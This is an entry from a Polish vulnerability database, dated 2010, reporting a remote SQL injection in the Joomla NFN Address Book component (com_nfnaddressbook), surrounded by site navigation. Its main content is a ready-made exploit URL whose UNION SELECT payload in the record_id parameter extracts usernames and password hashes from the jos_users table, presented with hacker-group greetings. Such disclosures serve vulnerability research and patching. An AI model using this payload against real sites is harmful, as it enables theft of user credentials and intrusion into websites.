Bezpieczeństwo informacji

, Wiadomości IT, Audyt bezpieczeństwa

Rejestracja | Zapomniałem hasła | Zaloguj się

	SecurityReason
Wiadomości IT

Dodaj wiadomość

Szukaj

Baza SecurityAlert

O SecurityAlert

Baza ExploitAlert

Badania SecurityReason

	WLB
Baza WLB

Dodaj Note WLB

O WLB

	Audyt
Informacje

Harmonogram

Cena

Referencje

Kontakt

	RSS
Wiadomości

SecurityAlert

ExploitAlert

Apache

PHP

WLB

	Zespół
Kontakt

Informacje o firmie



	Informacja
Jeśli znalazłeś interesujący błąd i chcesz go nam wysłać, użyj adresu: secalert(.)securityreason(.)pl Twój exploit może być opublikowany w dziale ExploitAlert. Wyślij go nam na adres: exploit(.)securityreason(.)pl

Strona główna

Baza WLB

Tytuł :	The Joomla NFN Address Book component remote SQL injection
WLB :	WLB-2010030064 (Szczegóły)

Data publikacji :

2010-03-16

Autor : DrEadFul

Poziom ryzyka : Średni Poziom Średni

(Szczegóły)

Zdalny błąd : Tak

Lokalny błąd : Nie

Status : Bład

Historia :
[2010-03-16] Publikacja

Podatne oprogramowanie :

The Joomla NFN Address Book

Tekst :

===========================================================================
===
[»] Joomla com_nfnaddressbook Remote Sql Injection Vulnerability
===========================================================================
===

[»] Script: [Joomla]
[»] Language: [ PHP ]
[»] Founder: [ Snakespc Email:super_crist4l@hotmail.com -
Site:sec-war.com/cc> ]
[»] Greetz to:[ DrEadFul, PrEdAtOr ,alnjm33 >>> All My Mamber >>
sec-war.com/cc ]

###########################################################################

===[ Exploit ]===

[»]
http://localhost/joomla/index.php?option=com_nfnaddressbook&Itemid=61&actio
n=viewrecord&record_id=-4+UNION SELECT
1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--

[»]Author: DrEadFul<-
###########################################################################

Referencje :

None

Jeżeli chcesz zmienić powyższą note, prosze użyj UCP

	Apache
» Apache HTTP Server Denial of Service Vulnerability

» Multiple Vendors libc/fnmatch(3) DoS (incl apache poc)

» Apache Continuum cross-site scripting vulnerability

» Apache Tomcat DoS Vulnerability



	PHP
» PHP Hashtables Denial of Service

» PHP 5.3.6 multiple null pointer dereference

» PHP 5.3.6 ZipArchive invalid use glob(3)

» libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)



	Patronat
Szkolenia ISecMan

Szkolenia Multitrain